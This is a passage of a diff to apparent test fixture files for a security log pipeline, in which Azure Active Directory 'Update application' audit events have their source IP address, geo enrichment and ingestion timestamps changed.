Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -191,25 +173,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -223,7 +187,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -337,7 +301,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -349,12 +313,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036040700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n 
\\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124825700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\
"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": 
\\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -380,25 +344,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -412,7 +358,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -526,7 +472,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -538,12 +484,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036048500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n 
\\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124832900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\
"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":